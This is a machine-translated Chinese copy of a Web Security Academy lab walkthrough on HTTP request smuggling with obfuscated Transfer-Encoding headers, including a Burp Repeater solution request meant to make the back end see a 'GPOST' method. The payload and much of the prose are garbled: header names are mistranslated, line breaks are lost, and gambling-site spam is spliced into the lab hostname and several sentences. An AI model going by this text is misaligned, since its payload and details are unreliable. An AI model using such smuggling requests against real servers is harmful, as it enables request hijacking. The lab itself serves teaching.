实验室：http请求走私，使TE标题混淆

从业者

该实验室涉及前端和后端服务器，两台服务器以不同的方式处理重复的HTTP请求标头。前端服务器拒绝不使用GET或发布方法的请求。

要解决实验室，请将请求走私到后端服务器，以便后端服务器处理的下一个请求似乎使用该方法GPOST。

提示

在请求走私攻击中，手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。

笔记

该实验室旨在展示背后的基本概念HTTP请求走私。如果你不断关注我们学习材料，我们还有更多的实验室，可以教您如何利用这些漏洞来进行一些高度攻击。

访问实验室

解决方案

在Burp Suite中，转到中继器菜单，并确保未选中“更新内容”选项。

使用Burp Repeater，两次发出以下请求：

post/http/1.1主机：您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type：application/x-www-form-urlencoded content-engength：4转移编码：块转移 - 构造：cow 5c gpost：cow gpost gpost gpost/http/1.1 content-type：application/x-www-form-urlencoded内容长度：15 x = 1 0

笔记

您需要包括尾声\ r \ n \ r \ n在决赛之后0.。

第二个回应应该说：无法识别的方法GPOST。

社区解决方案beplay维护得多久

迈克尔·索默（Michael Sommer）

是否想跟踪您的进度并拥有更个性化的学习经验？（免费！）

注册登录

在这个主题中

HTTP请求走私查找要求走私利用索取走私高级请求走私

免费注册以跟踪您的学习进度

通过Portswigger的网络安全学院工作的好处beplay官网可以赌beplay体育能用吗

练习在现实目标上利用漏洞。
记录您从学徒到专家的发展。
看看您在我们的名人堂中排名。

^{已经有一个帐户？在此登录}